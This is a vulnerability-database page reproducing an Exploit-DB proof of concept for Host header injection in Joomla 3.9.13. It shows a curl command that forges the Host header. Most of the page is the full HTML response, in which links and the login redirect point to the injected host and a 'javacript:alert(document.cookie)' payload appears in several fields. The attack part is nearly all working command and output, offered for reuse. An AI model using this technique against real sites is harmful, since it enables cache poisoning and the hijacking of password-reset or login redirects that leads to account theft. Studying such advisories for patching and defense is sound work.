Vulners
Lucene search
Joomla 3.9.13 - 'Host' Header Injection
# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
# Author: Pablo Santiago
# Date: 2019-11-12
# Vendor Homepage: https://www.joomla.org/
# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
# Version: 3.9.13
# CVE : N/A
# Tested on: Windows 10
#PoC
curl http://localhost/joomla/ -H "Host: exploit-db.com"
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<base href="http://exploit-db.com/joomla/" />
<meta name="description" content="javacript:alert(document.cookie)" />
<meta name="generator" content="Joomla! - Open Source Content
Management" />
<title>Home</title>
<link href="/joomla/index.php?format=feed&type=rss"
rel="alternate" type="application/rss+xml" title="RSS 2.0" />
<link href="/joomla/index.php?format=feed&type=atom"
rel="alternate" type="application/atom+xml" title="Atom 1.0" />
<link href="/joomla/templates/protostar/favicon.ico"
rel="shortcut icon" type="image/vnd.microsoft.icon" />
<link href="/joomla/templates/protostar/css/template.css?190197408a83fd286a9c42640a0f2f22"
rel="stylesheet" />
<link href="https://fonts.googleapis.com/css?family=Open+Sans"
rel="stylesheet" />
<style>
h1, h2, h3, h4, h5, h6, .site-title {
font-family: 'Open Sans', sans-serif;
}
</style>
<script type="application/json" class="joomla-script-options
new">{"csrf.token":"d460ac322fbbb6ae67cc78034182d9e1","system.paths":{"root":"\/joomla","base":"\/joomla"},"system.keepalive":{"interval":840000,"uri":"\/joomla\/index.php\/component\/ajax\/?format=json"}}</script>
<script
src="/joomla/media/jui/js/jquery.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-noconflict.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-migrate.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/system/js/caption.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/bootstrap.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/templates/protostar/js/template.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/jui/js/html5.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/core.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/system/js/polyfill.event.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/keepalive.js?190197408a83fd286a9c42640a0f2f22"></script>
<script>
jQuery(window).on('load', function() {
new JCaption('img.caption');
jQuery(function($){ initTooltips(); $("body").on("subform-row-add",
initTooltips); function initTooltips (event, container) { container =
container || document;$(container).find(".hasTooltip").tooltip({"html":
true,"container": "body"});} });
</script>
</head>
<body class="site com_content view-featured no-layout no-task itemid-101">
<!-- Body -->
<div class="body" id="top">
<div class="container">
<!-- Header -->
<header class="header" role="banner">
<div class="header-inner clearfix">
<a class="brand pull-left"
href="/joomla/">
<span
class="site-title"
title="javacript:alert(document.cookie)">javacript:alert(document.cookie)</span>
</a>
<div class="header-search pull-right">
</div>
</div>
</header>
<div class="row-fluid">
<main
id="content" role="main" class="span9">
<!-- Begin Content -->
<div id="system-message-container">
</div>
<div class="blog-featured"
itemscope itemtype="https://schema.org/Blog">
<div class="page-header">
<h1>
Home </h1>
</div>
</div>
<div class="clearfix"></div>
<div aria-label="breadcrumbs"
role="navigation">
<ul itemscope itemtype="https://schema.org/BreadcrumbList"
class="breadcrumb">
<li>
You are here:  
</li>
<li
itemprop="itemListElement" itemscope
itemtype="https://schema.org/ListItem" class="active">
<span itemprop="name">
Home
</span>
<meta itemprop="position" content="1">
</li>
</ul>
</div>
<!-- End Content -->
</main>
<div id="aside" class="span3">
<!-- Begin Right Sidebar -->
<div class="well
_menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu
mod-list">
<li class="item-101 default current active"><a
href="/joomla/index.php" >Home</a></li></ul>
</div><div class="well "><h3 class="page-header">Login Form</h3><form
action="/joomla/index.php" method="post" id="login-form"
class="form-inline">
<div class="userdata">
<div id="form-login-username" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-user hasTooltip" title="Username"></span>
<label
for="modlgn-username" class="element-invisible">Username</label>
</span>
<input
id="modlgn-username" type="text" name="username" class="input-small"
tabindex="0" size="18" placeholder="Username" />
</div>
</div>
</div>
<div id="form-login-password" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-lock hasTooltip" title="Password">
</span>
<label
for="modlgn-passwd" class="element-invisible">Password
</label>
</span>
<input
id="modlgn-passwd" type="password" name="password" class="input-small"
tabindex="0" size="18" placeholder="Password" />
</div>
</div>
</div>
<div
id="form-login-remember" class="control-group checkbox">
<label for="modlgn-remember"
class="control-label">Remember Me</label> <input id="modlgn-remember"
type="checkbox" name="remember" class="inputbox" value="yes"/>
</div>
<div id="form-login-submit"
class="control-group">
<div class="controls">
<button type="submit" tabindex="0"
name="Submit" class="btn btn-primary login-button">Log in</button>
</div>
</div>
<ul class="unstyled">
<li>
<a
href="/joomla/index.php/component/users/?view=remind&Itemid=101">
Forgot your username?</a>
</li>
<li>
<a
href="/joomla/index.php/component/users/?view=reset&Itemid=101">
Forgot your password?</a>
</li>
</ul>
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.login" />
<input type="hidden" name="return"
value="aHR0cDovL2V4cGxvaXQtZGIuY29tL2pvb21sYS8=" />
<input type="hidden"
name="d460ac322fbbb6ae67cc78034182d9e1" value="1" /> </div>
</form>
</div>
<!-- End Right Sidebar -->
</div>
</div>
</div>
</div>
<!-- Footer -->
<footer class="footer" role="contentinfo">
<div class="container">
<hr />
<p class="pull-right">
<a href="#top" id="back-top">
Back to Top
</a>
</p>
<p>
© 2019
javacript:alert(document.cookie) </p>
</div>
</footer>
</body>
</html>
#PoC Visual
https://imgur.com/a/IgO4ZxIData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Nov 2019 00:00Current